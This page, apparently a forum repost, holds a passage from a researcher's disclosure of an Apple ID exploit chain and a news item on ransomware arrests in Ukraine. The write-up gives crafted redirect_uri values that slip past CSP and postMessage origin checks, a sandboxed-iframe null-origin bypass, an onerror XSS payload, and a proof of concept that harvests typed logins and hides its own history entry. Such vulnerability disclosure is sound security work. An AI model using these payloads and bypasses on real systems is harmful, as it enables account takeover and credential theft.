parameter is being used for a different purpose: to specify the domain that can embed the login page. In a twist of fate, this one fell prey to a similar bug to the one from how to hack the uk tax system, i guess, which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs, web addresses are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome Devtools, I found that a redirect_uri of ‘https://abc@www.icloud.com’ would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is how do we get the iCloud login page into our page? Consult this reference on embed control: X-Frame-Options: DENY Prevents any kind of embedding pros: ancient, everyone supports it cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic X-Frame-Options: ALLOW-FROM http://example.com Only allows embedding from a specific place pros: A really good idea from a security perspective cons: was literally only supported by Firefox and Internet Explorer for a short time so using it will probably make you less secure Content-Security-Policy: frame-ancestors Only allows embedding from specific place(s) pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls cons: probably very old browsers will ignore it If you check Chrome DevTools’s ‘network’ panel, you will find the AppleID signon page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing), and Content-Security-Policy: frame-ancestors. Here’s a cut-down version of what the Content-Security-Policy header looks like when ‘redirect_uri’ is set to the default “https://www.icloud.com/” Content-Security-Policy: frame-ancestors ‘self’ https://www.icloud.com This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@icloud.com? Content-Security-Policy: frame-ancestors ‘self’ https://abc@www.icloud.com Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to ‘https://mywebsite.com;@icloud.com/’, then, the AppleID server continues to think all is well, but sends: Content-Security-Policy: frame-ancestors ‘self’ https://mywebsite.com;@www.icloud.com This is because the ‘URI’ language that’s used to express web addresses is contextually different to the language used to express Content Security Policies. ‘https://mywebsite.com;@www.icloud.com’ is a totally valid URL, meaning the same as ‘https://www.icloud.com’ but to Content-Security-Policy, the same statement means ‘https://mywebsite.com’ and then some extra garbage which gets ignored after the ‘;’. Using this, we can embed the Apple ID login page in our own page. However, not everything is quite as it seems. If you fail to be able to embed a page in chrome, you get this cute lil guy: But, instead we get a big box of absolutely nothing: Part 2: Communicating with the blank box Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message: {"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"} This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to ‘https://idmsa.apple.com/appleauth/jslog’, assumedly to report to Apple that an error occurred. Chrome DevTools’ ‘sources’ panel has a component on the right called “XHR/fetch Breakpoints” which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there’s this: new Promise(function(e, n) { it.call({ destination: window.parent, publicProcedureName: "ready", params: [{ iframeTitle: d.a.getString("iframeTitle") }], onSuccess: function(t) { e(t) }, onError: function(t) { n(t) }, retries: p.a.meta.FEConfiguration.pmrpcRetryCount, timeout: p.a.meta.FEConfiguration.pmrpcTimeout, destinationDomain: p.a.destinationDomain }) } The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready and failing over and over (see: retries). This communication is happening over the postMessage (the ‘pm’ of pmrpc ). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com ; then, since our embedding page is not that domain, there’s a failure. We can inject code into the AppleID Javascript and the iCloud javascript to view their version of this conversation: AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“ready”],”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2"} AppleID tells iCloud it’s ready to receive messages. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2",”result”:true} iCloud responds to the ping request with a ‘pong’ response. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”ready”,”params”:[{“iframeTitle”:” Sign In with Your Apple ID”}],”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55"} AppleID tells iCloud that the frame is named ‘Sign in with Your Apple ID’ (I’m guessing to make the title of the page correct). iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55",”result”:true} iCloud acknowledges receipt of the title. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“config”],”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”} AppleID asks iCloud if it wants the login to be configured. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”,”result”:true} iCloud acknowledges receipt of the configuration request, and says that it does, yes want the login to be configured. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”config”,”params”:[],”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”} AppleID asks iCloud for a login dialog configuration. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:{“data”:{“features”:{“rememberMe”:true,”createLink”:false,”iForgotLink”:true,”pause2FA”:false},”signInLabel”:”Sign in to iCloud”,”serviceKey”:”d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d”,”defaultAccountNameAutoFillDomain”:”icloud.com”,”trustTokens”:[“HSARMTnl/S90E=SRVX”],”rememberMeLabel”:”keep-me-signed-in”,”theme”:”dark”,”waitAnimationOnAuthComplete”:false,”logo”:{“src”:”data:image/png;base64,[ … ]ErkJggg==”,”width”:”100px”}}}} iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption “Sign in to iCloud”, and, for example whether a link should be provided for if the user forgets their password. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:true} iCloud confirms receipt of the login configuration. In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here. Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can’t just impersonate iCloud — by having every postMessage have a targetOrigin, basically a specified destination of the webpage. It’s not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place. Part 3: Snot-Nosed Kid Mode This one isn’t as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri , through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary. By placing a breakpoint at the destinationDomain line we had before, we can see that unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, ‘https://mywebsite.com;@wwwicloud.com’ is being passed to postMessage, as though it were this code: window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com"); At first, this seems like an absolute impasse. In no possible way is our page going to be at the address ‘https://mywebsite.com;@www.icloud.com’. However, once you go from the reference documentation, to the technical specification the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this: Let parsedURL be the result of running the URL parser on targetOrigin. If parsedURL is failure, then throw a “SyntaxError" DOMException. Set targetOrigin to parsedURL’s origin. Crucially, despite “https://mywebsite.com;@www.icloud.com” being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this allows us purchase to sneak some extra content in there to potentially confuse other parts of AppleID’s machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com"); This information eventually bubbles down to the destinationDomain we’re trying to mess with. When toying with ‘redirect_uri’, I found that there’s a bug in the way this functionality is programmed in Apple’s server. For an input ‘https://mywebsite.com;"@www.icloud.com’ (note the double quote), this code is produced: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); The double quote is ‘escaped’ with a ‘\’ to ensure that we don’t break out of the quoted section and start executing our own code, however something a little odd happens when we input instead ‘https://mywebsite.com;%22@www.icloud.com’. ‘%22’ is what you get from ‘encodeURIComponent’ of a double quote, the opposite of what apple is doing here. bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before it even reaches this generated Javascript. Then, the generated Javascript is again performing the same decoding. Someone made the mistake of doing the same decoding on the client and server, but it didn’t become a functionality breaking bug because the intended usage doesn’t have any doubly encoded components. We can, however introduce these. 😉 Because the server is using the decodeURIComponent-ed form, and the client is using the twice decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to: https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com This order of operations then happens: AppleID’s server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com AppleID’s server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com , and gets https://www.icloud.com , which passes the first security check AppleID’s server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: allow-origin https://mywebsite.com%3F mywebsite.com;@www.icloud.com The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both ‘https://mywebsite.com%3f’ (which is nonsense) and ‘mywebsite.com’ (which is us!!!!). This passes the second security check and allows the page to continue loading. AppleID’s server generates the sign in page with the Javascript bootData.destinationDomain = decodeURIComponent(“https://mywebsite.com%3F mywebsite.com;@www.icloud.com"); The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com The browser when performing postMessage parses an origin again again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com . The ‘?’ causes everything after it to be ignored, resulting in the target origin ‘https://mywebsite.com’. This passes the third security check. However, this is only half of our problems, and our page will stay blank. Here’s what a blank page looks like, for reference: Part 4: Me? I’m Nobody. Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is also totally different from the one that is used for a postMessage send. The lowest-level browser mechanism that AppleID must be inevitably calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this: if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!"); This is just a ‘strict string comparison’, which means that we would, in theory have to impossibly be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com which has no chance of ever happening on God’s green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by ‘processJSONRpcRequest’, defined in ‘pmrpc.js’. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows: 254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin) This checks a value called ‘shouldCheckACL’ to determine if security is disabled, I guess 😉 That value, in turn comes from line 221: 221: shouldCheckACL : !isWorkerComm And then isWorkerComm comes to us via lines 205–206: 205: var eventSource = eventParams.source; 206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null; ‘eventParams’ is the event representing the postMessage, and ‘event.source’ is a reference to the window (i.e. page) that sent the message. I’d summarise this check as follows: if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com")) That means the origin check is completely skipped if message.source is ‘null’. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message for testing, its ‘source’ can be then set to ‘null’, and then you no longer need to worry about security getting in the way. Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event’s source is always a ‘WindowProxy object’, so it can never be ‘null’ instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag ‘allow-same-origin’, which, if not present in a sandboxed iframe sets the ‘Sandboxed origin browsing context flag’ (defined in section 7.5.3) which ‘forces the content into a unique origin’ (defined in section 7.5.5), which makes the window an ‘opaque origin’ (defined in section 7.5), which when given to Javascript is turned into null (!!!!). This means when we create an embedded, sandboxed frame, as long as we don’t provide the ‘allow-same-origin’ flag, we create a special window that is considered to be null , and thus bypasses the pmrpc security check on received messages. A ‘null’ page however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID with all the hard work we did before, and a ‘null’ page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks since it is a ‘null’ window, it must have generated them itself. You can read my reference implementation of this forwarding code, here. Part 5: More than Phishing Now that AppleID thinks we’re iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials? In our current state, having tricked Apple ID into thinking that we’re iCloud, we have a little box that fills in your apple email very nicely. When you log in to our embed we get an authentication for your Apple account over postMessage. Even if you don’t 2FA! This is because an authentication token is granted without passing 2FA for iCloud ‘Find My’, used for finding your potentially lost phone (which you might need to pass 2FA otherwise). However, this is basically phishing — although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page just the same. We need more. We’re already in a position of extreme privilege. Apple ID thinks we’re iCloud, so it’s likely that our interactions with the Apple ID system will be a lot more trusting with what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}} That’s all well and good, but what about the options that iCloud can use, but simply chooses not to? They won’t be here, but we can use Chrome DevTools’ ‘code search’ feature to search all the code the Apple ID client software uses. ‘signInLabel’ makes a good search term as it probably doesn’t turn up anywhere else: d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel), It looks like all of these settings like ‘signInLabel’ are part of this ‘envConfigFromConsumer’, so we can search for that: this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test")) d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()), n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)), n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)), n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)), n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)), n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)), n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")), n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())), i = d()(w.a, "envConfigFromConsumer.verificationToken", ""), These values we know from our config get given different names to put into a template. For example, ‘envConfigFromConsumer.features.footer’ becomes ‘showFooter’. In DevTools’ network panel, we can search all resources, code and otherwise the page uses for where these inputs end up: {{#if showRememberMe}} <div class="si-remember-password"> <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked"> <label id="remember-me-label" class="form-label" for="remember-me"> <span class="form-choice-indicator"></span> {{rememberMeText}} </label> </div> What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret. ‘{{value}}’ statements work like you expect, safely putting content into the page; but ‘{{{value}}}’ extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let’s see if an Apple engineer made a typo by searching the templates for “}}}”: {{#if showLearnMoreLink}} <div> {{{learnMoreLink}}} </div> {{/if}} {{#if showPrivacy}} <div class="label-small text-centered centered tk-caption privacy-wrapper"> <div class="privacy-icon"></div> {{{privacyText}}} </div> {{/if}} Perfect! From our previous research, we know that ‘privacyText’ comes from the configuration option ‘envConfigFromConsumer.privacy’, or just ‘privacy’. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" } , Apple ID will execute our code and show a little popup indicating what domain we have taken over: Part 6: Overindulgence Now it’s time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn’t scary enough. We have control over idmsa.apple.com, the Apple ID server browser client, and so we can access all the credentials saved there — your apple login and cookie — and in theory, we can ‘jump’ to other apple login windows. Those credentials are all stored in a form that we can use to take over an apple account, but they’re not a username and password. That’s what I think of as scary. For my proof of concept, I: Execute my full exploit chain to take over Apple ID. This requires only one click from the user. Present the user with a ‘login with AppleID’ button by deleting all the content of the Apple ID login page and replacing it with the standard button Open a new window to the real, full Apple ID login page, same as apple would when the button is clicked With our control of idmsa.apple.com, take control over the real Apple ID login dialog and inject our own code which harvests the logins as they are typed Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page — if the user checks if they came from a legitimate Apple site, they’ll just see apple.com and be unable to go back. Full commented source code can be found here. Video demonstration of the Proof of Concept on desktop Although I started this project before apple had its bug bounty program, I reported it just as the bug bounty program started and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I’m trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access “a small amount of sensitive data”. Hopefully other researchers are paid more! I also hope this was an interesting read! I took a really long time to write this with the pandemic kind of sapping my energy, and my sincere hope that despite the technical complexity here, I could write something accessible to those new to security. Thomas Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of fame 🥺🥺 Full timeline follows this article. edit: Apple says my Hall of Fame will happen in September! edit: September is almost over and it hasn’t happened! Timeline Report to fix time: 3 days Fix to offer time: 4 months, 3 days Payment offer to payment time: 4 months, 5 days Total time: 8 months, 8 days Friday, November 15th 2019 First apple bug, an XSS on apple.com reported Saturday, November 16th 2019 Issues noticed in Apple ID The previous bug I reported has been mitigated, but no email from Apple about it Thursday, November 21st 2019, 3:43AM GMT First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple user’s information. Thursday, November 21st 2019, 6:06AM GMT Templated response from Apple, saying they’re looking into it Thursday, November 21st 2019, 8:20PM GMT Provided first Apple ID proof of concept which injects malicious code, along with some video documentation. Sunday, November 24th 2019 The issue is mitigated (partially fixed) by Apple Thursday, November 28th 2019 Ask for updates Wednesday, December 4th 2019 I try to pull some strings with friends to get a reply Tuesday, December 3rd 2019 Apple tells me there is nothing to share with me December 10th 2019 I ask if there is an update Friday, January 10th 2019 I get an automated email saying, in essence (1) don’t disclose the bug to the public until ‘investigation is complete’ and (2) Apple will provide information over the course of the investigation. Email for an update Wednesday, January 29th 2020 Ask for another update (at the 2 month mark) Friday, January 31st 2020 Am asked to check if it’s been fixed. Yes, but not exactly in the way I might have liked. Sunday, February 2nd 2020 At Schmoocon, a security conference in Washington DC I happen to meet the director of the responsible disclosure program. I talk about the difficulties I’ve had. Tuesday, February 4th 2020 Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame as of August 2021, I have still not been publicly credited. I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later. Saturday, February 15th 2020 I ask for an update on status Monday, February 17th 2020 Apple responds: no updates. I ask when I’ll hear back Friday, February 21st 2020 I contact the director of the program with the details I got at schmoo, asking when the expected turnaround on bugs is Monday, March 2nd 2020 Apple responds. They say they have no specfic date Tuesday, March 3rd 2020 The director responds, saying they don’t give estimates on timelines, but he’ll get it looked into Tuesday, March 24th 2020 Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there Sunday, March 29th 2020 Enroll in the Apple Developer program, and ask when I’ll be able to disclose publicly. Tuesday, March 31st 2020 Told to accept the terms and set up my account and tax information (I am not told anything about disclosure) Tuesday, March 31st 2020 Ask for more detailled instructions, because I can’t find out how to set up my account and tax information (this is because my Apple Developers application has not yet been accepted) Thursday, April 2nd 2020 Ask if this is being considered as a generic XSS because the payout seems weird compared to the examples Tuesday, April 28th Apple replies to request for more detailed instructions (it’s the same thing, but reworded) May 13th 2020 I ask for an update May 18th 2020 Am told the money is “in process to be paid”, with no exact date but expected in May or early June. They’ll get back when they know. May 23rd 2020 I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate. May 18th 2020 I ask again when I can disclose. June 8th 2020 I ask for some kind of update on payment or when I can disclose. June 10th 2020 I am informed that there is ‘a new process’. The new process means I pay myself for my Apple Developers account, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He’s no longer with Apple. June 15th 2020 Apple asks me to provide an ‘enrolment ID’. June 15th 2020 I send apple a screenshot of what I am seeing. All my application shows is ‘Contact us to continue your enrolment’. I say I’m pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified (2) when I can disclose this and (3) what I am missing to get paid I also rant about it on twitter, which was probably the most productive thing I did to get a proper response in retrospect June 19th 2020 Apple gets in touch, saying they’ve completed the account review and now I need to set up a bank account to get paid in. Apple says they’re OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure Thursday, July 2nd 2020 The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by, and asks me to correct where I say I found this bug only “a few days ago” in the draft I wrote 🤔 July 29th 2020 I get paid … the pandemic happens 12 August 2021 I finish my writeup! Amendments 22/Aug/21: Fixed link to ‘full source code’, which originally linked to only a very small portion of the full source. Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
  15. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." Besides the two arrests, the international police operation witnessed a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million. The suspects are believed to have demanded hefty sums ranging anywhere between €5 to €70 million as part of their extortion spree, and are connected to a gang that's staged ransomware attacks against more than 100 different companies, causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed. One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added. The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html
×
×
  • Create New...